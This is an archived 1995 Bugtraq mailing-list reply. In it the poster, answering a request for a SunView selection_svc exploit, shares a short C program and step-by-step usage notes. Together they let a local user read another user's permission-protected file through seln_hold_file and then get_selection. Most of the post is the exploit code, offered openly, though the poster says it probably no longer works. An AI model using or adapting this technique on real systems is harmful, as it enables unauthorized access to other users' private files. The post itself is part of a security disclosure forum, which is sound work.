[1324] in bugtraq
Re: selection_svc exploit?
daemon@ATHENA.MIT.EDU (Bonfield James)
Fri Mar 24 07:46:07 1995
From: Bonfield James <jkb@mrc-lmb.cam.ac.uk>
To: bugtraq@fc.net
Date: Fri, 24 Mar 1995 08:51:42 +0000 (GMT)
In-Reply-To: <Pine.SGI.3.91.950323224646.20374A-100000@sgi2.phlab.missouri.edu> from "Paul 'Shag' Walmsley" at Mar 23, 95 10:47:26 pm
Paul "Shag" Walmsley wrote:
>
>On Thu, 23 Mar 1995, Mike Neuman wrote:
>
>> Does anyone have a selection_svc exploit? I know what the problem is,
>
>What is the problem?
Well I've got some code that's been kicking around for years (5 or so maybe),
that exploits a Sunview selection_svc problem. I doubt if it's the same bug as
more recent selection_svc holes, but I do wonder whether people ever learn
from past problems. I doubt this code works anymore as I doubt anyone uses
Sunview these days.
Anyway, thanks to James Beckett (Hiya James!) from whom I snarfed this code
oh so long ago. I would leave it up to James to post this code, but I
have a feeling he may not have it anymore.
James
/* SELN_HOLD_FILE
* For use where someone has a selection_svc runnning as them, after an
* invocation of suntools:
*
* % cat their_private_file
* their_private_file: Permission denied
* % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
* % ./seln_hold_file their_private_file
* % get_selection 2
* < contents of their_private_file >
* %
*/
#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>
main(argc, argv)
int argc;
char *argv[];
{
Seln_result ret;
if (argc != 2) {
(void) fprintf(stderr, "usage: seln_grab file1\n");
exit(1);
}
ret = seln_hold_file(SELN_SECONDARY, argv[1]);
seln_dump_result(stdout, &ret);
printf("\n");
}
/*
* Local variables:
* compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow"
* end:
*
* Static required because _mem_ops not included in ld.so
*/
